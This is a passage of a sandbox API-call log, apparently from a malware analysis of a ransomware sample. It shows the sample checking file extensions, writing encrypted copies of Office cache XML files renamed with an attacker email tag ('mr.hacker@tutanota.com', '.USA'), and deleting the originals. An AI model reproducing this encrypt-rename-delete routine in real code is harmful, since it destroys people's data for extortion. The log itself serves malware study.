Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml") returned 75 [0034.812] lstrlenW (lpString=".zip") returned 4 [0034.812] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0034.812] lstrlenW (lpString=".rar") returned 4 [0034.812] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0034.812] lstrlenW (lpString=".bz2") returned 4 [0034.812] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0034.812] lstrlenW (lpString=".7z") returned 3 [0034.812] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0034.812] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml") returned 75 [0034.812] lstrlenW (lpString=".dbf") returned 4 [0034.812] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0034.812] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml") returned 75 [0034.812] lstrlenW (lpString=".1cd") returned 4 [0034.812] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0034.812] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml") returned 75 [0034.813] lstrlenW (lpString=".jpg") returned 4 [0034.813] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0034.813] lstrcmpiW (lpString1=".xml", lpString2=".USA") returned 1 [0034.813] lstrlenW (lpString="AccessMUI.xml") returned 13 [0034.813] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\accessmui.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0035.037] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x2baff1c | out: lpFileSize=0x2baff1c*=1349) returned 1 [0035.037] CloseHandle (hObject=0x17c) returned 1 [0035.037] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\accessmui.xml")) returned 0x2020 [0035.037] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.xml.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\accessmui.xml.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0035.037] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\accessmui.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0035.037] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bafec8 | out: lpNewFilePointer=0x0) returned 1 [0035.037] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bafec8 | out: lpNewFilePointer=0x0) returned 1 [0035.037] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.xml.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\accessmui.xml.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0035.038] GetLastError () returned 0x0 [0035.038] ReadFile (in: hFile=0x17c, lpBuffer=0x32c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bafed4, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesRead=0x2bafed4*=0x545, lpOverlapped=0x0) returned 1 [0035.040] WriteFile (in: hFile=0x180, lpBuffer=0x32c0020*, nNumberOfBytesToWrite=0x550, lpNumberOfBytesWritten=0x2bafc9c, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesWritten=0x2bafc9c*=0x550, lpOverlapped=0x0) returned 1 [0035.041] ReadFile (in: hFile=0x17c, lpBuffer=0x32c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bafed4, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesRead=0x2bafed4*=0x0, lpOverlapped=0x0) returned 1 [0035.041] WriteFile (in: hFile=0x180, lpBuffer=0x32c0020*, nNumberOfBytesToWrite=0xee, lpNumberOfBytesWritten=0x2bafc9c, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesWritten=0x2bafc9c*=0xee, lpOverlapped=0x0) returned 1 [0035.041] SetEndOfFile (hFile=0x180) returned 1 [0035.043] CloseHandle (hObject=0x180) returned 1 [0035.044] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bafec8 | out: lpNewFilePointer=0x0) returned 1 [0035.044] SetEndOfFile (hFile=0x17c) returned 1 [0035.045] CloseHandle (hObject=0x17c) returned 1 [0035.045] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.xml.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x2020) returned 1 [0035.045] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\accessmui.xml")) returned 1 [0035.045] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.xml") returned 89 [0035.045] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.xml") returned 89 [0035.045] lstrlenW (lpString=".doc") returned 4 [0035.045] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0035.045] lstrlenW (lpString=".docx") returned 5 [0035.045] lstrcmpiW (lpString1=".docx", lpString2="I.xml") returned -1 [0035.045] lstrlenW (lpString=".pdf") returned 4 [0035.045] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0035.046] lstrlenW (lpString=".xls") returned 4 [0035.046] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0035.046] lstrlenW (lpString=".xlsx") returned 5 [0035.046] lstrcmpiW (lpString1=".xlsx", lpString2="I.xml") returned -1 [0035.046] lstrlenW (lpString=".ppt") returned 4 [0035.046] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0035.046] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.xml") returned 89 [0035.046] lstrlenW (lpString=".zip") returned 4 [0035.046] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0035.046] lstrlenW (lpString=".rar") returned 4 [0035.046] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0035.046] lstrlenW (lpString=".bz2") returned 4 [0035.046] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0035.046] lstrlenW (lpString=".7z") returned 3 [0035.046] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0035.046] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.xml") returned 89 [0035.046] lstrlenW (lpString=".dbf") returned 4 [0035.046] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0035.046] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.xml") returned 89 [0035.046] lstrlenW (lpString=".1cd") returned 4 [0035.046] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0035.046] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.xml") returned 89 [0035.046] lstrlenW (lpString=".jpg") returned 4 [0035.046] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0035.046] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.xml") returned 89 [0035.046] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.xml") returned 89 [0035.046] lstrlenW (lpString=".doc") returned 4 [0035.046] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0035.046] lstrlenW (lpString=".docx") returned 5 [0035.046] lstrcmpiW (lpString1=".docx", lpString2="I.xml") returned -1 [0035.046] lstrlenW (lpString=".pdf") returned 4 [0035.047] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0035.047] lstrlenW (lpString=".xls") returned 4 [0035.047] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0035.047] lstrlenW (lpString=".xlsx") returned 5 [0035.047] lstrcmpiW (lpString1=".xlsx", lpString2="I.xml") returned -1 [0035.047] lstrlenW (lpString=".ppt") returned 4 [0035.047] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0035.047] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.xml") returned 89 [0035.047] lstrlenW (lpString=".zip") returned 4 [0035.047] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0035.047] lstrlenW (lpString=".rar") returned 4 [0035.047] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0035.047] lstrlenW (lpString=".bz2") returned 4 [0035.047] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0035.047] lstrlenW (lpString=".7z") returned 3 [0035.047] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0035.047] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.xml") returned 89 [0035.047] lstrlenW (lpString=".dbf") returned 4 [0035.047] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0035.047] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.xml") returned 89 [0035.047] lstrlenW (lpString=".1cd") returned 4 [0035.047] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0035.047] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.xml") returned 89 [0035.047] lstrlenW (lpString=".jpg") returned 4 [0035.047] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0035.047] lstrcmpiW (lpString1=".xml", lpString2=".USA") returned 1 [0035.047] lstrlenW (lpString="Office32WW.xml") returned 14 [0035.048] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.xml" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\office32ww.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0035.048] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x2baff1c | out: lpFileSize=0x2baff1c*=4274) returned 1 [0035.048] CloseHandle (hObject=0x17c) returned 1 [0035.049] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.xml" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\office32ww.xml")) returned 0x2020 [0035.049] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.xml.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\office32ww.xml.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0035.049] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.xml" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\office32ww.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0035.049] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bafec8 | out: lpNewFilePointer=0x0) returned 1 [0035.049] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bafec8 | out: lpNewFilePointer=0x0) returned 1 [0035.049] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.xml.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\office32ww.xml.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0035.049] GetLastError () returned 0x0 [0035.049] ReadFile (in: hFile=0x17c, lpBuffer=0x32c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bafed4, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesRead=0x2bafed4*=0x10b2, lpOverlapped=0x0) returned 1 [0035.051] WriteFile (in: hFile=0x180, lpBuffer=0x32c0020*, nNumberOfBytesToWrite=0x10c0, lpNumberOfBytesWritten=0x2bafc9c, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesWritten=0x2bafc9c*=0x10c0, lpOverlapped=0x0) returned 1 [0035.052] ReadFile (in: hFile=0x17c, lpBuffer=0x32c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bafed4, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesRead=0x2bafed4*=0x0, lpOverlapped=0x0) returned 1 [0035.052] WriteFile (in: hFile=0x180, lpBuffer=0x32c0020*, nNumberOfBytesToWrite=0xf0, lpNumberOfBytesWritten=0x2bafc9c, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesWritten=0x2bafc9c*=0xf0, lpOverlapped=0x0) returned 1 [0035.052] SetEndOfFile (hFile=0x180) returned 1 [0035.052] CloseHandle (hObject=0x180) returned 1 [0035.053] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bafec8 | out: lpNewFilePointer=0x0) returned 1 [0035.053] SetEndOfFile (hFile=0x17c) returned 1 [0035.054] CloseHandle (hObject=0x17c) returned 1 [0035.054] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.xml.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x2020) returned 1 [0035.054] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.xml" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\office32ww.xml")) returned 1 [0035.054] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.xml") returned 77 [0035.054] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.xml") returned 77 [0035.054] lstrlenW (lpString=".doc") returned 4 [0035.054] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0035.054] lstrlenW (lpString=".docx") returned 5 [0035.054] lstrcmpiW (lpString1=".docx", lpString2="W.xml") returned -1 [0035.054] lstrlenW (lpString=".pdf") returned 4 [0035.055] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0035.055] lstrlenW (lpString=".xls") returned 4 [0035.055] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0035.055] lstrlenW (lpString=".xlsx") returned 5 [0035.055] lstrcmpiW (lpString1=".xlsx", lpString2="W.xml") returned -1 [0035.055] lstrlenW (lpString=".ppt") returned 4 [0035.055] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0035.055] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.xml") returned 77 [0035.055] lstrlenW (lpString=".zip") returned 4 [0035.055] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0035.055] lstrlenW (lpString=".rar") returned 4 [0035.055] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0035.055] lstrlenW (lpString=".bz2") returned 4 [0035.055] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0035.055] lstrlenW (lpString=".7z") returned 3 [0035.055] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0035.055] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.xml") returned 77 [0035.055] lstrlenW (lpString=".dbf") returned 4 [0035.055] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0035.055] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.xml") returned 77 [0035.055] lstrlenW (lpString=".1cd") returned 4 [0035.055] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0035.055] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.xml") returned 77 [0035.055] lstrlenW (lpString=".jpg") returned 4 [0035.055] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0035.055] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.xml") returned 77 [0035.055] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.xml") returned 77 [0035.055] lstrlenW (lpString=".doc") returned 4 [0035.055] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0035.055] lstrlenW (lpString=".docx") returned 5 [0035.055] lstrcmpiW (lpString1=".docx", lpString2="W.xml") returned -1 [0035.056] lstrlenW (lpString=".pdf") returned 4 [0035.056] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0035.056] lstrlenW (lpString=".xls") returned 4 [0035.056] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0035.056] lstrlenW (lpString=".xlsx") returned 5 [0035.056] lstrcmpiW (lpString1=".xlsx", lpString2="W.xml") returned -1 [0035.056] lstrlenW (lpString=".ppt") returned 4 [0035.056] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0035.056] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.xml") returned 77 [0035.056] lstrlenW (lpString=".zip") returned 4 [0035.056] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0035.056] lstrlenW (lpString=".rar") returned 4 [0035.056] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0035.056] lstrlenW (lpString=".bz2") returned 4 [0035.056] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0035.056] lstrlenW (lpString=".7z") returned 3 [0035.056] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0035.056] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.xml") returned 77 [0035.056] lstrlenW (lpString=".dbf") returned 4 [0035.056] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0035.056] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.xml") returned 77 [0035.056] lstrlenW (lpString=".1cd") returned 4 [0035.056] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0035.056] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.xml") returned 77 [0035.056] lstrlenW (lpString=".jpg") returned 4 [0035.056] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0035.056] lstrcmpiW (lpString1=".xml", lpString2=".USA") returned 1 [0035.056] lstrlenW (lpString="PrjProrWW.xml") returned 13 [0035.057] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.xml" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\prjprorww.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0035.057] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x2baff1c | out: lpFileSize=0x2baff1c*=6421) returned 1 [0035.057] CloseHandle (hObject=0x17c) returned 1 [0035.057] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.xml" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\prjprorww.xml")) returned 0x2020 [0035.058] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.xml.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\prjprorww.xml.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0035.058] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.xml" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\prjprorww.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0035.058] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bafec8 | out: lpNewFilePointer=0x0) returned 1 [0035.058] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bafec8 | out: lpNewFilePointer=0x0) returned 1 [0035.058] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.xml.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\prjprorww.xml.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0035.058] GetLastError () returned 0x0 [0035.058] ReadFile (in: hFile=0x17c, lpBuffer=0x32c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bafed4, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesRead=0x2bafed4*=0x1915, lpOverlapped=0x0) returned 1 [0035.060] WriteFile (in: hFile=0x180, lpBuffer=0x32c0020*, nNumberOfBytesToWrite=0x1920, lpNumberOfBytesWritten=0x2bafc9c, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesWritten=0x2bafc9c*=0x1920, lpOverlapped=0x0) returned 1 [0035.061] ReadFile (in: hFile=0x17c, lpBuffer=0x32c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bafed4, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesRead=0x2bafed4*=0x0, lpOverlapped=0x0) returned 1 [0035.061] WriteFile (in: hFile=0x180, lpBuffer=0x32c0020*, nNumberOfBytesToWrite=0xee, lpNumberOfBytesWritten=0x2bafc9c, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesWritten=0x2bafc9c*=0xee, lpOverlapped=0x0) returned 1 [0035.061] SetEndOfFile (hFile=0x180) returned 1 [0035.061] CloseHandle (hObject=0x180) returned 1 [0035.062] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bafec8 | out: lpNewFilePointer=0x0) returned 1 [0035.062] SetEndOfFile (hFile=0x17c) returned 1 [0035.062] CloseHandle (hObject=0x17c) returned 1 [0035.062] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.xml.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x2020) returned 1 [0035.063] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.xml" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\prjprorww.xml")) returned 1 [0035.063] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.xml") returned 76 [0035.063] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.xml") returned 76 [0035.063] lstrlenW (lpString=".doc") returned 4 [0035.063] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0035.063] lstrlenW (lpString=".docx") returned 5 [0035.063] lstrcmpiW (lpString1=".docx", lpString2="W.xml") returned -1 [0035.063] lstrlenW (lpString=".pdf") returned 4 [0035.063] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0035.063] lstrlenW (lpString=".xls") returned 4 [0035.063] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0035.063] lstrlenW (lpString=".xlsx") returned 5 [0035.063] lstrcmpiW (lpString1=".xlsx", lpString2="W.xml") returned -1 [0035.063] lstrlenW (lpString=".ppt") returned 4 [0035.063] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0035.063] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.xml") returned 76 [0035.063] lstrlenW (lpString=".zip") returned 4 [0035.063] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0035.063] lstrlenW (lpString=".rar") returned 4 [0035.063] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0035.063] lstrlenW (lpString=".bz2") returned 4 [0035.064] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0035.064] lstrlenW (lpString=".7z") returned 3 [0035.064] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0035.064] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.xml") returned 76 [0035.064] lstrlenW (lpString=".dbf") returned 4 [0035.064] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0035.064] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.xml") returned 76 [0035.064] lstrlenW (lpString=".1cd") returned 4 [0035.064] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0035.064] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.xml") returned 76 [0035.064] lstrlenW (lpString=".jpg") returned 4 [0035.064] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0035.064] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.xml") returned 76 [0035.064] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.xml") returned 76 [0035.064] lstrlenW (lpString=".doc") returned 